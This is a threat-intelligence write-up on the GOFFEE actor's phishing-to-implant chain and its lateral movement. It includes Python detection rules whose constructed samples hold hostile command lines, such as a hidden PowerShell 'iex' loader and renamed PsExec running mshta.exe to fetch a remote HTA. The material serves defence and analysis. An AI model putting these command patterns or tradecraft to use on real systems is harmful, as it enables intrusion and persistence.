GOFFEE Threat Actor Targeting Russian Organizations

Summary

Kaspersky identified activity the GOFFEE threat actor conducted in the second half of 2024 against Russian organizations. The campaign used PowerTaskel, a private Mythic agent written in PowerShell, and introduced a new implant, PowerModul. Targets were concentrated in critical sectors, including media and telecommunications, construction, government, and energy.

GOFFEE is a threat actor that Kaspersky first observed in early 2022. Since then it has been seen conducting malicious activity exclusively against entities within the Russian Federation, delivered through spear-phishing emails carrying malicious attachments.

Between May 2022 and the summer of 2023, GOFFEE consistently deployed a modified version of Owowa, a malicious IIS module, in its operations. Starting in 2024 the group shifted tactics and began delivering patched, malicious copies of explorer.exe via spear-phishing campaigns.

Technical Analysis

GOFFEE uses several infection schemes that all begin with a phishing email carrying a malicious attachment. The entry point is the same, but the techniques diverge after delivery; two primary chains were observed. In the first, the attachment is a RAR archive containing an executable disguised as a document, often with a double extension such as ".pdf.exe" or ".doc.exe" to deceive the user. When run, the file displays a decoy document fetched from the command-and-control (C&C) server to distract the victim while the malicious activity proceeds in the background. The executable is a legitimate Windows system file (for example explorer.exe or xpsrchvw.exe) that has been patched to include malicious shellcode; because the bytes have been altered, the file's Authenticode signature no longer verifies, which makes signature validation a cheap first triage check. The shellcode contains an obfuscated Mythic agent that contacts the C&C server shortly after execution.

The second vector also uses a RAR archive, but one containing a Microsoft Office document with a malicious macro. On opening, the document shows scrambled text and a prompt urging the user to click "Enable Content", claiming the file was created in an older version of Microsoft Word. Once enabled, the macro decodes the scrambled text, hides the warning image, and drops two files, a .hta file and a PowerShell script, into the user's current directory. It then sets the per-user Load registry value (HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load) to the path of the .hta file, so that the HTA is executed automatically whenever that user logs on.

The .hta file does not launch the PowerShell implant (PowerModul) directly. Instead it uses cmd.exe to write a JavaScript file named UserCacheHelper.lnk.js, which in turn runs UserCache.ini, a PowerShell script containing the encoded PowerModul payload. Notably, the malicious files contain hard-coded paths tied to the user's specific environment, so file names and sizes differ from one infection to the next.
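Detection logic for the chain above, as an added example that is not part of the original post or the Kaspersky report. It runs two rules over constructed Sysmon-style JSON events (Event 13 for a registry value being set, Event 1 for process creation). The event contents, host names, user names and paths are invented; the exact PowerShell invocation and the use of wscript.exe as the script host are assumptions, since the post only says the .js file "launches" the .ini script.

```python
"""Hunting the macro persistence and HTA -> cmd -> .lnk.js -> PowerShell
chain in Sysmon-style telemetry. Added example, not code from the report or
this post. Field names follow Sysmon Event 13 (RegistryEvent, value set) and
Event 1 (ProcessCreate); every sample event below is constructed, and all
hosts, users and paths in it are fictional."""
import json
import re
from typing import Iterator, List, Optional

# Per-user auto-start value the macro sets; matched case-insensitively as a
# suffix so both HKCU\... and Sysmon's HKU\<SID>\... spellings are caught.
LOAD_VALUE_SUFFIX = r"\software\microsoft\windows nt\currentversion\windows\load"
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # assumed host for the .js stage

# Constructed JSON-lines sample (not real telemetry).
SAMPLE_EVENTS = r"""
{"EventID": 13, "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load", "Details": "C:\\Users\\ivanov\\Documents\\UserCache.hta"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "mshta.exe C:\\Users\\ivanov\\Documents\\UserCache.hta"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "cmd.exe /c echo var sh=new ActiveXObject('WScript.Shell'); > C:\\Users\\ivanov\\Documents\\UserCacheHelper.lnk.js"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\wscript.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "wscript.exe C:\\Users\\ivanov\\Documents\\UserCacheHelper.lnk.js"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\wscript.exe", "CommandLine": "powershell.exe -w hidden -ep bypass -c \"iex([IO.File]::ReadAllText('C:\\Users\\ivanov\\Documents\\UserCache.ini'))\""}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -File C:\\Scripts\\backup.ps1"}
{"EventID": 13, "Image": "C:\\Windows\\regedit.exe", "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load", "Details": ""}
"""


def parse_events(text: str) -> Iterator[dict]:
    """Yield one event per non-empty JSON line."""
    for line in text.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def load_value_persistence(ev: dict) -> Optional[str]:
    """Rule 1: the per-user Load value now points at an .hta file."""
    if ev.get("EventID") != 13:
        return None
    if not ev.get("TargetObject", "").lower().endswith(LOAD_VALUE_SUFFIX):
        return None
    target = ev.get("Details", "")
    if target.lower().endswith(".hta"):
        return f"Load value set to HTA {target} by {basename(ev.get('Image', ''))}"
    return None  # empty or non-HTA data: still unusual, but not this rule


def hta_script_chain(ev: dict) -> Optional[str]:
    """Rule 2: a stage of the HTA -> cmd -> .lnk.js -> PowerShell chain."""
    if ev.get("EventID") != 1:
        return None
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmdline = ev.get("CommandLine", "").lower()
    if image == "cmd.exe" and parent == "mshta.exe" and "echo" in cmdline and ".js" in cmdline:
        return "mshta.exe spawned cmd.exe to write a .js file"
    if image in SCRIPT_HOSTS and re.search(r"\.lnk\.js\b", cmdline):
        return f"{image} running a double-extension .lnk.js script"
    if image == "powershell.exe" and parent in SCRIPT_HOSTS:
        hint = " reading code from a non-.ps1 file" if ".ini" in cmdline else ""
        return f"powershell.exe launched by {parent}{hint}"
    return None


RULES = (load_value_persistence, hta_script_chain)


def hunt(text: str) -> List[str]:
    """Run every rule over every event and return the findings in order."""
    findings = []
    for ev in parse_events(text):
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

On the sample, the benign backup.ps1 launch and the regedit write of an empty Load value produce no findings; the four stages of the malicious chain each produce one. In production the Load-value rule is the cheapest to deploy, since legitimate software almost never writes that value.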

PowerModul

PowerModul is a PowerShell-based implant first observed in early 2024. Initially treated as a simple loader for the PowerTaskel backdoor, it has since been classified as a standalone malware family because of its distinct communication protocol, unique payload structure, and separate C&C infrastructure.

In the infection chain, PowerModul is embedded in the UserCache.ini file as a Base64-encoded string. Once decoded and executed, the script initiates communication with the C&C server and also replicates part of the dropper macro's functionality, such as creating and hiding malicious files and modifying registry keys. On execution, PowerModul collects system identifiers (computer name, username, and disk serial number) and appends them to the C&C URL; the server responds with Base64-encoded PowerShell modules wrapped in XML, which are decoded and executed on the victim machine.

A notable feature of PowerModul is a function named OfflineWorker(), which executes hard-coded Base64 payloads even without active C&C communication. In some samples the offline payload string is empty; in others it has been used to deliver additional tools such as FlashFileGrabber, a data theft utility.

Overall, PowerModul is a flexible, modular implant used to maintain persistence, download additional payloads, and operate both online and offline. It has been used to deploy various second-stage tools, including PowerTaskel, FlashFileGrabber, and USB worms, which indicates its central role in GOFFEE's evolving toolset.

Lateral Movement

The lateral-movement activity associated with PowerTaskel follows a structured, layered approach to privilege escalation and remote execution. After a successful compromise, PowerTaskel attempts to elevate to SYSTEM using PsExec, a legitimate administrative tool from the Sysinternals suite. The utility, often renamed ntuser.exe or 1cv9.exe, is dropped into the same directory as PowerTaskel and used to run mshta.exe with SYSTEM-level privileges. The command line includes a URL pointing to a malicious HTA file, which is then downloaded and executed. A renamed PsExec is still identifiable from the OriginalFileName in its PE version information, and it still installs its PSEXESVC service on the host it runs against, so both are worth alerting on.

The HTA file is the centre of a scripted chain of commands that re-executes PowerTaskel with elevated privileges. It uses simple console commands such as echo to write JavaScript and text files to disk, which are then run in sequence: one script writes and runs the next, ending with a PowerShell script. That script acts as a loader, retrieving the main PowerTaskel payload from a hard-coded location and launching it under the SYSTEM account.

Once PowerTaskel is running with elevated privileges, it communicates with its command-and-control server to retrieve and execute additional tasks. One notable capability is its use of csc.exe, the C# command-line compiler, to compile and run shellcode loaders on the fly. These loaders are typically paired with an auxiliary DLL that allocates memory and injects a more advanced payload, the Mythic agent, which offers extensive post-exploitation functionality and can further extend the attacker's control across the network.

For lateral movement, the Mythic agent uses Windows Remote Management (WinRM) to reach other systems on the network. It issues HTTP requests to the WinRM endpoints (TCP 5985/5986 by default) on remote machines with a distinctive User-Agent string, "Ruby WinRM Client", which indicates automation via Ruby-based tooling. Once access is established, the agent executes additional HTA payloads on the remote systems, typically through mshta.exe wrapped in PowerShell or CMD commands. These remote executions follow the same pattern as the initial infection, allowing the attacker to propagate laterally while remaining stealthy.
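The lateral-movement tradecraft in the last three paragraphs (renamed PsExec, mshta.exe pulling an HTA as SYSTEM, HTA execution inside a WinRM session, and the "Ruby WinRM Client" User-Agent) expressed as detection rules, as an added example that is not part of the original post or the report. Process records follow Sysmon Event 1 field names and HTTP records follow Zeek http.log field names; every record, address, host, user and path is constructed. The PE OriginalFileName value "psexec.c" for PsExec and wsmprovhost.exe as the parent of commands run over WinRM are facts about those tools, not something the post states.

```python
"""Flagging renamed PsExec, SYSTEM-level mshta.exe with a URL, mshta.exe
launched through a WinRM session, and the Ruby WinRM User-Agent in
constructed telemetry. Added example, not code from the report or this post.
Process records use Sysmon Event 1 fields; HTTP records use Zeek http.log
fields. All hosts, addresses, users and paths are fictional."""
import json
import re
from typing import Iterator, List, Optional

# PsExec's PE version info carries OriginalFilename "psexec.c"; the service
# binary it drops is psexesvc.exe. Any other on-disk name is a rename.
PSEXEC_ORIGINAL_NAMES = {"psexec.c", "psexec.exe", "psexesvc.exe"}
PSEXEC_EXPECTED_NAMES = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}
WINRM_PORTS = {5985, 5986}          # WinRM over HTTP / HTTPS
URL_RE = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)

SAMPLE_RECORDS = r"""
{"EventID": 1, "Image": "C:\\Users\\ivanov\\AppData\\Local\\Temp\\ntuser.exe", "OriginalFileName": "psexec.c", "User": "CORP\\ivanov", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "ntuser.exe -accepteula -s -d mshta.exe http://198.51.100.7/update.hta"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "OriginalFileName": "MSHTA.EXE", "User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\Windows\\PSEXESVC.exe", "CommandLine": "mshta.exe http://198.51.100.7/update.hta"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "OriginalFileName": "MSHTA.EXE", "User": "CORP\\svc-deploy", "ParentImage": "C:\\Windows\\System32\\wsmprovhost.exe", "CommandLine": "mshta http://198.51.100.7/update.hta"}
{"EventID": 1, "Image": "C:\\Tools\\PsExec.exe", "OriginalFileName": "psexec.c", "User": "CORP\\admin", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "PsExec.exe \\\\srv01 ipconfig"}
{"ts": "2024-09-03T10:15:02Z", "id.orig_h": "10.0.0.15", "id.resp_h": "10.0.0.42", "id.resp_p": 5985, "method": "POST", "uri": "/wsman", "user_agent": "Ruby WinRM Client"}
{"ts": "2024-09-03T10:16:40Z", "id.orig_h": "10.0.0.15", "id.resp_h": "10.0.0.42", "id.resp_p": 5985, "method": "POST", "uri": "/wsman", "user_agent": "Microsoft WinRM Client"}
"""


def parse_records(text: str) -> Iterator[dict]:
    for line in text.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def renamed_psexec(ev: dict) -> Optional[str]:
    """Rule 1: a binary whose version info says PsExec but whose name does not."""
    if ev.get("EventID") != 1:
        return None
    orig = ev.get("OriginalFileName", "").lower()
    image = basename(ev.get("Image", ""))
    if orig in PSEXEC_ORIGINAL_NAMES and image not in PSEXEC_EXPECTED_NAMES:
        return f"renamed PsExec: {image} (OriginalFileName {orig})"
    return None


def mshta_remote_hta(ev: dict) -> Optional[str]:
    """Rules 2 and 3: mshta.exe given a URL, with the context it ran in."""
    if ev.get("EventID") != 1 or basename(ev.get("Image", "")) != "mshta.exe":
        return None
    url = URL_RE.search(ev.get("CommandLine", ""))
    if not url:
        return None
    parent = basename(ev.get("ParentImage", ""))
    user = ev.get("User", "").upper()
    if user.endswith("\\SYSTEM") or parent == "psexesvc.exe":
        return f"mshta.exe as SYSTEM (parent {parent}) fetching {url.group(0)}"
    if parent == "wsmprovhost.exe":   # WinRM provider host: the command arrived over WinRM
        return f"mshta.exe inside a WinRM session fetching {url.group(0)}"
    return f"mshta.exe fetching remote HTA {url.group(0)}"


def ruby_winrm_client(rec: dict) -> Optional[str]:
    """Rule 4: the non-Windows WinRM client the Mythic agent was seen using."""
    if rec.get("id.resp_p") not in WINRM_PORTS:
        return None
    if rec.get("user_agent", "").lower().startswith("ruby winrm client"):
        return f"Ruby WinRM client {rec.get('id.orig_h')} -> {rec.get('id.resp_h')}:{rec['id.resp_p']}"
    return None


RULES = (renamed_psexec, mshta_remote_hta, ruby_winrm_client)


def hunt(text: str) -> List[str]:
    findings = []
    for rec in parse_records(text):
        for rule in RULES:
            hit = rule(rec)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_RECORDS):
        print(finding)
```

The fourth sample record (PsExec run under its own name by an administrator) is deliberately left unflagged by the rename rule; whether unrenamed PsExec is acceptable is a per-environment decision, whereas a renamed copy launching mshta.exe with a URL is not.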

Recent activity suggests that GOFFEE is shifting from PowerTaskel towards the Mythic agent for lateral movement, most likely because the Mythic framework's modularity offers greater control, automation, and adaptability in complex network environments.

Mythic agent HTA

The Mythic agent deployed in this campaign is delivered through a heavily obfuscated, multi-layered execution chain built around a polyglot payload. Execution starts with mshta.exe pointed at a URL that serves a roughly 180 KB file which is treated as an HTA but contains several embedded components: the file begins with the Mythic agent shellcode, followed by two Base64-encoded PowerShell scripts, and ends with an HTA section containing obfuscated JScript.

When executed, the HTA script determines how it was launched and locates its own cached copy in the system's InetCache directory. It then creates two new files, settings.js and settings.ps1, runs them with specific arguments, and deletes them shortly afterwards. Together these scripts extract, decode, and execute the embedded PowerShell: reading the Base64 scripts, compiling a helper DLL, allocating memory, and finally injecting the Mythic shellcode. Once active, the Mythic agent provides advanced post-exploitation capabilities, including in-memory execution and stealthy command-and-control communication, giving the attacker persistent and covert access to the compromised system.
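A triage carver for the polyglot layout just described (shellcode, two Base64 PowerShell scripts, then HTML/JScript), as an added example that is not the actor's tooling and not code from the report or this post. The post does not say how the sections are delimited or how the scripts are encoded, so the newline separators, the UTF-8/UTF-16LE guess, the placeholder shellcode bytes, the sample scripts and the HTA tail are all constructed assumptions; the carver only relies on the ordering the text gives.

```python
"""Carving a polyglot HTA: shellcode, then Base64 PowerShell scripts, then
HTML/JScript. Added example, not the actor's code or the report's. Section
separators, the decoding heuristics and the whole sample are assumptions."""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional

# Earliest of these markers (case-insensitive) is taken as the start of the HTA.
HTA_MARKERS = (b"<hta:application", b"<html", b"<script")
# A Base64 run long enough to be a script rather than a stray identifier.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{48,}={0,2}")


@dataclass
class Carved:
    shellcode: bytes
    scripts: List[str]
    hta: str
    hta_offset: int


def find_hta_start(data: bytes) -> int:
    """Offset of the first HTML/HTA marker; raises if the file has none."""
    low = data.lower()
    hits = [p for p in (low.find(m) for m in HTA_MARKERS) if p != -1]
    if not hits:
        raise ValueError("no HTML/HTA markup found; not a polyglot HTA")
    return min(hits)


def decode_script(run: bytes) -> Optional[str]:
    """Base64 -> text. UTF-16LE if the bytes look like it (PowerShell's usual
    -EncodedCommand encoding), otherwise UTF-8; None if neither applies."""
    try:
        raw = base64.b64decode(run, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("utf-16-le") if b"\x00" in raw else raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def carve_polyglot(data: bytes) -> Carved:
    """Split the file into its three regions and decode the embedded scripts."""
    hta_start = find_hta_start(data)
    head = data[:hta_start]
    runs = list(B64_RUN.finditer(head))
    shellcode_end = runs[0].start() if runs else len(head)
    shellcode = head[:shellcode_end].rstrip(b"\r\n")   # assumed newline separator
    scripts = [s for s in (decode_script(m.group(0)) for m in runs) if s is not None]
    return Carved(shellcode, scripts, data[hta_start:].decode("utf-8", "replace"), hta_start)


# --- constructed sample (placeholder bytes, not real shellcode) ---------------
SHELLCODE_SAMPLE = b"\xfc\x48\x83\xe4\xf0" + bytes(range(0x80, 0xc0))
SCRIPT_A = "$d = [IO.Path]::GetTempPath(); Write-Host \"stage one in $d\""
SCRIPT_B = "Add-Type -TypeDefinition $helperSource; Write-Host 'stage two ready'"
HTA_TAIL = (b"<html><hta:application id=\"x\"><script language=\"JScript\">"
            b"/* obfuscated loader would be here */</script></html>")


def build_sample() -> bytes:
    """Assemble a file in the layout described: shellcode, two Base64 scripts, HTA."""
    b64 = lambda s: base64.b64encode(s.encode("utf-8"))
    return SHELLCODE_SAMPLE + b"\n" + b64(SCRIPT_A) + b"\n" + b64(SCRIPT_B) + b"\n" + HTA_TAIL


if __name__ == "__main__":
    carved = carve_polyglot(build_sample())
    print(f"shellcode: {len(carved.shellcode)} bytes, HTA at offset {carved.hta_offset}")
    for i, script in enumerate(carved.scripts, 1):
        print(f"script {i}: {script}")
```

Against a real sample, the carved shellcode prefix is what goes to an emulator or disassembler, and the decoded scripts are what show how the helper DLL is compiled and the shellcode injected; the raw file hash is of limited use because the actor varies content per victim.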

In this campaign the attackers used PowerTaskel, a tool previously associated with GOFFEE, together with HTA files and multiple scripts. The malicious executable attached to the spear-phishing email is a patched explorer.exe resembling samples from earlier GOFFEE attacks in 2024, and its shellcode closely matches previously identified GOFFEE payloads. Given the overlap in tools, techniques, and victim targeting, the campaign is attributed to GOFFEE with a high degree of confidence.

Recommendations

  • The initial compromise originates with a spear-phishing email. Implement robust email filtering to detect and block malicious attachments, including archives that contain executables with double extensions, before they reach end users.

  • Treat email attachments and embedded links with caution, especially from unfamiliar senders, and verify the sender's legitimacy whenever a message is unexpected or suspicious.

  • Restrict scripting tools and living-off-the-land binaries such as PowerShell and mshta.exe on workstations and servers where they are not essential (for example through AppLocker or WDAC rules and PowerShell Constrained Language Mode), reducing the attack surface for script-based threats.

  • Enforce application allowlisting so that only trusted, approved applications and DLLs can execute across the environment.

  • Monitor outbound web requests with URL filtering and threat intelligence. In this campaign mshta.exe fetches HTA content directly from attacker infrastructure, so script hosts initiating HTTP requests are a strong signal.

  • Deploy network-level monitoring to detect anomalies such as unexpected WinRM traffic between workstations or potential data exfiltration, and block suspicious activity proactively.

Written by

Siti Rahmiati K.